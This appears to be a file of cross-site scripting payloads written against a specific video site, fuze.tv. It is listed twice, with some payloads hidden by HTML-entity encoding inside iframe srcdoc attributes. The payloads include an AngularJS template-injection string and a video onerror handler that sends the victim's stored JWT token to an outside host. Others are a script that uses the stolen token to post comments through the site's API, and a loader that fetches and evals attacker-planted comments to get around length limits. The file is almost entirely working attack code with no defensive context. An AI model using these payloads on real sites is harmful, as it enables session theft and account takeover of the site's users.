lutwidse/fuze.tv-xss.js

## fuze.tv-xss.js
- XSS AngularJS
{{constructor.constructor('alert(1)')()}}

- XSS steal token
<video><source onerror=location=/\google.com/+localStorage.getItem("jwt_token")>

- XSS that cause user to interact with API
<script>const scheme = ["ht","tp","s"]; const payload = {"message":"Hello there","parentId":"0","attachedVideoEntryId":null};const param = {method: "POST", headers: {'Authorization': localStorage.getItem("jwt_token"), 'Accept': "application/json, text/plain, */*", 'Content-Type': "application/json;charset=UTF-8"}, body: JSON.stringify(payload)};fetch(scheme.join('')+"://brain.fuze.tv/api/feed/comment/1/60fac75b38e93f0019fc24d6", param).then((res)=>{return(res.json());}).then((json)=>{alert("executed")})</script>
<iframe srcdoc=&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x63;&#x6F;&#x6E;&#x73;&#x74;&#x20;&#x73;&#x63;&#x68;&#x65;&#x6D;&#x65;&#x20;&#x3D;&#x20;&#x5B;&#x22;&#x68;&#x74;&#x22;&#x2C;&#x22;&#x74;&#x70;&#x22;&#x2C;&#x22;&#x73;&#x22;&#x5D;&#x3B;&#x20;&#x63;&#x6F;&#x6E;&#x73;&#x74;&#x20;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x20;&#x3D;&#x20;&#x7B;&#x22;&#x6D;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x22;&#x3A;&#x22;&#x48;&#x65;&#x6C;&#x6C;&#x6F;&#x20;&#x74;&#x68;&#x65;&#x72;&#x65;&#x22;&#x2C;&#x22;&#x70;&#x61;&#x72;&#x65;&#x6E;&#x74;&#x49;&#x64;&#x22;&#x3A;&#x22;&#x30;&#x22;&#x2C;&#x22;&#x61;&#x74;&#x74;&#x61;&#x63;&#x68;&#x65;&#x64;&#x56;&#x69;&#x64;&#x65;&#x6F;&#x45;&#x6E;&#x74;&#x72;&#x79;&#x49;&#x64;&#x22;&#x3A;&#x6E;&#x75;&#x6C;&#x6C;&#x7D;&#x3B;&#x63;&#x6F;&#x6E;&#x73;&#x74;&#x20;&#x70;&#x61;&#x72;&#x61;&#x6D;&#x20;&#x3D;&#x20;&#x7B;&#x6D;&#x65;&#x74;&#x68;&#x6F;&#x64;&#x3A;&#x20;&#x22;&#x50;&#x4F;&#x53;&#x54;&#x22;&#x2C;&#x20;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x73;&#x3A;&#x20;&#x7B;&#x27;&#x41;&#x75;&#x74;&#x68;&#x6F;&#x72;&#x69;&#x7A;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x27;&#x3A;&#x20;&#x6C;&#x6F;&#x63;&#x61;&#x6C;&#x53;&#x74;&#x6F;&#x72;&#x61;&#x67;&#x65;&#x2E;&#x67;&#x65;&#x74;&#x49;&#x74;&#x65;&#x6D;&#x28;&#x22;&#x6A;&#x77;&#x74;&#x5F;&#x74;&#x6F;&#x6B;&#x65;&#x6E;&#x22;&#x29;&#x2C;&#x20;&#x27;&#x41;&#x63;&#x63;&#x65;&#x70;&#x74;&#x27;&#x3A;&#x20;&#x22;&#x61;&#x70;&#x70;&#x6C;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x2F;&#x6A;&#x73;&#x6F;&#x6E;&#x2C;&#x20;&#x74;&#x65;&#x78;&#x74;&#x2F;&#x70;&#x6C;&#x61;&#x69;&#x6E;&#x2C;&#x20;&#x2A;&#x2F;&#x2A;&#x22;&#x2C;&#x20;&#x27;&#x43;&#x6F;&#x6E;&#x74;&#x65;&#x6E;&#x74;&#x2D;&#x54;&#x79;&#x70;&#x65;&#x27;&#x3A;&#x20;&#x22;&#x61;&#x70;&#x70;&#x6C;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x2F;&#x6A;&#x73;&#x6F;&#x6E;&#x3B;&#x63;&#x68;&#x61;&#x72;&#x73;&#x65;&#x74;&#x3D;&#x55;&#x54;&#x46;&#x2D;&#x38;&#x22;&#x7D;&#x2C;&#x20;&#x62;&#x6F;&#x64;&#x79;&#x3A;&#x20;&#x4A;&#x53;&#x4F;&#x4E;&#x2E;&#x73;&#x74;&#x72;&#x69;&#x6E;&#x67;&#x69;&#x66;&#x79;&#x28;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x29;&#x7D;&#x3B;&#x66;&#x65;&#x74;&#x63;&#x68;&#x28;&#x73;&#x63;&#x68;&#x65;&#x6D;&#x65;&#x2E;&#x6A;&#x6F;&#x69;&#x6E;&#x28;&#x27;&#x27;&#x29;&#x2B;&#x22;&#x3A;&#x2F;&#x2F;&#x62;&#x72;&#x61;&#x69;&#x6E;&#x2E;&#x66;&#x75;&#x7A;&#x65;&#x2E;&#x74;&#x76;&#x2F;&#x61;&#x70;&#x69;&#x2F;&#x66;&#x65;&#x65;&#x64;&#x2F;&#x63;&#x6F;&#x6D;&#x6D;&#x65;&#x6E;&#x74;&#x2F;&#x31;&#x2F;&#x36;&#x30;&#x66;&#x61;&#x63;&#x37;&#x35;&#x62;&#x33;&#x38;&#x65;&#x39;&#x33;&#x66;&#x30;&#x30;&#x31;&#x39;&#x66;&#x63;&#x32;&#x34;&#x64;&#x36;&#x22;&#x2C;&#x20;&#x70;&#x61;&#x72;&#x61;&#x6D;&#x29;&#x2E;&#x74;&#x68;&#x65;&#x6E;&#x28;&#x28;&#x72;&#x65;&#x73;&#x29;&#x3D;&#x3E;&#x7B;&#x72;&#x65;&#x74;&#x75;&#x72;&#x6E;&#x28;&#x72;&#x65;&#x73;&#x2E;&#x6A;&#x73;&#x6F;&#x6E;&#x28;&#x29;&#x29;&#x3B;&#x7D;&#x29;&#x2E;&#x74;&#x68;&#x65;&#x6E;&#x28;&#x28;&#x6A;&#x73;&#x6F;&#x6E;&#x29;&#x3D;&#x3E;&#x7B;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x22;&#x65;&#x78;&#x65;&#x63;&#x75;&#x74;&#x65;&#x64;&#x22;&#x29;&#x7D;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;></iframe>

- XSS payload from comments and Bypass text length limitation
<script>const payloadScheme = ["ht","tp","s"]; fetch(payloadScheme.join('')+'://brain.fuze.tv/public/feed/comments/60fac75b38e93f0019fc24d6/0/2/cached.js').then(response => response.json()).then(json => {payload = json["comments"].slice(-1)[0]["message"].replace(/&gt;/g, ">"); payloadSecond = json["comments"].slice(-2)[0]["message"].replace(/&gt;/g, ">"); eval(payload); alert(payloadSecond);});</script>
<iframe srcdoc=&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x63;&#x6F;&#x6E;&#x73;&#x74;&#x20;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x53;&#x63;&#x68;&#x65;&#x6D;&#x65;&#x20;&#x3D;&#x20;&#x5B;&#x22;&#x68;&#x74;&#x22;&#x2C;&#x22;&#x74;&#x70;&#x22;&#x2C;&#x22;&#x73;&#x22;&#x5D;&#x3B;&#x20;&#x66;&#x65;&#x74;&#x63;&#x68;&#x28;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x53;&#x63;&#x68;&#x65;&#x6D;&#x65;&#x2E;&#x6A;&#x6F;&#x69;&#x6E;&#x28;&#x27;&#x27;&#x29;&#x2B;&#x27;&#x3A;&#x2F;&#x2F;&#x62;&#x72;&#x61;&#x69;&#x6E;&#x2E;&#x66;&#x75;&#x7A;&#x65;&#x2E;&#x74;&#x76;&#x2F;&#x70;&#x75;&#x62;&#x6C;&#x69;&#x63;&#x2F;&#x66;&#x65;&#x65;&#x64;&#x2F;&#x63;&#x6F;&#x6D;&#x6D;&#x65;&#x6E;&#x74;&#x73;&#x2F;&#x36;&#x30;&#x66;&#x61;&#x63;&#x37;&#x35;&#x62;&#x33;&#x38;&#x65;&#x39;&#x33;&#x66;&#x30;&#x30;&#x31;&#x39;&#x66;&#x63;&#x32;&#x34;&#x64;&#x36;&#x2F;&#x30;&#x2F;&#x32;&#x2F;&#x63;&#x61;&#x63;&#x68;&#x65;&#x64;&#x2E;&#x6A;&#x73;&#x27;&#x29;&#x2E;&#x74;&#x68;&#x65;&#x6E;&#x28;&#x72;&#x65;&#x73;&#x70;&#x6F;&#x6E;&#x73;&#x65;&#x20;&#x3D;&#x3E;&#x20;&#x72;&#x65;&#x73;&#x70;&#x6F;&#x6E;&#x73;&#x65;&#x2E;&#x6A;&#x73;&#x6F;&#x6E;&#x28;&#x29;&#x29;&#x2E;&#x74;&#x68;&#x65;&#x6E;&#x28;&#x6A;&#x73;&#x6F;&#x6E;&#x20;&#x3D;&#x3E;&#x20;&#x7B;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x20;&#x3D;&#x20;&#x6A;&#x73;&#x6F;&#x6E;&#x5B;&#x22;&#x63;&#x6F;&#x6D;&#x6D;&#x65;&#x6E;&#x74;&#x73;&#x22;&#x5D;&#x2E;&#x73;&#x6C;&#x69;&#x63;&#x65;&#x28;&#x2D;&#x31;&#x29;&#x5B;&#x30;&#x5D;&#x5B;&#x22;&#x6D;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x22;&#x5D;&#x2E;&#x72;&#x65;&#x70;&#x6C;&#x61;&#x63;&#x65;&#x28;&#x2F;&#x26;&#x67;&#x74;&#x3B;&#x2F;&#x67;&#x2C;&#x20;&#x22;&#x3E;&#x22;&#x29;&#x3B;&#x20;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x53;&#x65;&#x63;&#x6F;&#x6E;&#x64;&#x20;&#x3D;&#x20;&#x6A;&#x73;&#x6F;&#x6E;&#x5B;&#x22;&#x63;&#x6F;&#x6D;&#x6D;&#x65;&#x6E;&#x74;&#x73;&#x22;&#x5D;&#x2E;&#x73;&#x6C;&#x69;&#x63;&#x65;&#x28;&#x2D;&#x32;&#x29;&#x5B;&#x30;&#x5D;&#x5B;&#x22;&#x6D;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x22;&#x5D;&#x2E;&#x72;&#x65;&#x70;&#x6C;&#x61;&#x63;&#x65;&#x28;&#x2F;&#x26;&#x67;&#x74;&#x3B;&#x2F;&#x67;&#x2C;&#x20;&#x22;&#x3E;&#x22;&#x29;&#x3B;&#x20;&#x65;&#x76;&#x61;&#x6C;&#x28;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x2B;&#x22;&#x29;&#x22;&#x29;&#x3B;&#x20;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x53;&#x65;&#x63;&#x6F;&#x6E;&#x64;&#x29;&#x3B;&#x7D;&#x29;&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;></iframe>
	- XSS AngularJS
	{{constructor.constructor('alert(1)')()}}

	- XSS steal token
	<video><source onerror=location=/\google.com/+localStorage.getItem("jwt_token")>

	- XSS that cause user to interact with API
	<script>const scheme = ["ht","tp","s"]; const payload = {"message":"Hello there","parentId":"0","attachedVideoEntryId":null};const param = {method: "POST", headers: {'Authorization': localStorage.getItem("jwt_token"), 'Accept': "application/json, text/plain, /", 'Content-Type': "application/json;charset=UTF-8"}, body: JSON.stringify(payload)};fetch(scheme.join('')+"://brain.fuze.tv/api/feed/comment/1/60fac75b38e93f0019fc24d6", param).then((res)=>{return(res.json());}).then((json)=>{alert("executed")})</script>
	<iframe srcdoc=<script>const scheme = ["ht","tp","s"]; const payload = {"message":"Hello there","parentId":"0","attachedVideoEntryId":null};const param = {method: "POST", headers: {'Authorization': localStorage.getItem("jwt_token"), 'Accept': "application/json, text/plain, /", 'Content-Type': "application/json;charset=UTF-8"}, body: JSON.stringify(payload)};fetch(scheme.join('')+"://brain.fuze.tv/api/feed/comment/1/60fac75b38e93f0019fc24d6", param).then((res)=>{return(res.json());}).then((json)=>{alert("executed")})</script>></iframe>

	- XSS payload from comments and Bypass text length limitation
	<script>const payloadScheme = ["ht","tp","s"]; fetch(payloadScheme.join('')+'://brain.fuze.tv/public/feed/comments/60fac75b38e93f0019fc24d6/0/2/cached.js').then(response => response.json()).then(json => {payload = json["comments"].slice(-1)[0]["message"].replace(/>/g, ">"); payloadSecond = json["comments"].slice(-2)[0]["message"].replace(/>/g, ">"); eval(payload); alert(payloadSecond);});</script>
	<iframe srcdoc=<script>const payloadScheme = ["ht","tp","s"]; fetch(payloadScheme.join('')+'://brain.fuze.tv/public/feed/comments/60fac75b38e93f0019fc24d6/0/2/cached.js').then(response => response.json()).then(json => {payload = json["comments"].slice(-1)[0]["message"].replace(/&gt;/g, ">"); payloadSecond = json["comments"].slice(-2)[0]["message"].replace(/&gt;/g, ">"); eval(payload+")"); alert(payloadSecond);});</script>></iframe>